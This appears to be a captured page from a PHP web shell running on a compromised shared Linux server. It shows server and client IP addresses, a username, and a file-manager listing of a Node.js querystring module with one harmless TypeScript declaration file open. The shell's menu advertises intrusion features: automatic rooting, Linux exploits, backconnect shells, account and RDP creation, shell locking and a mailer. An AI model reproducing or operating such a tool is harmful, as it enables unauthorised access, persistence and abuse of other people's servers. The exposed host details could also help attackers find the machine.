Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
querystring /
[ HOME SHELL ]
Name
Size
Permission
Action
decode.d.ts
747
B
-rw-r--r--
decode.js
2.34
KB
-rw-r--r--
encode.d.ts
542
B
-rw-r--r--
encode.js
2.06
KB
-rw-r--r--
index.d.ts
230
B
-rw-r--r--
index.js
127
B
-rw-r--r--
package.json
823
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : decode.d.ts
/** * parses a URL query string into a collection of key and value pairs * * @param qs The URL query string to parse * @param sep The substring used to delimit key and value pairs in the query string * @param eq The substring used to delimit keys and values in the query string * @param options.decodeURIComponent The function to use when decoding percent-encoded characters in the query string * @param options.maxKeys Specifies the maximum number of keys to parse. Specify 0 to remove key counting limitations default 1000 */ export type decodeFuncType = ( qs?: string, sep?: string, eq?: string, options?: { decodeURIComponent?: Function; maxKeys?: number; } ) => Record<any, unknown>; export default decodeFuncType;
Close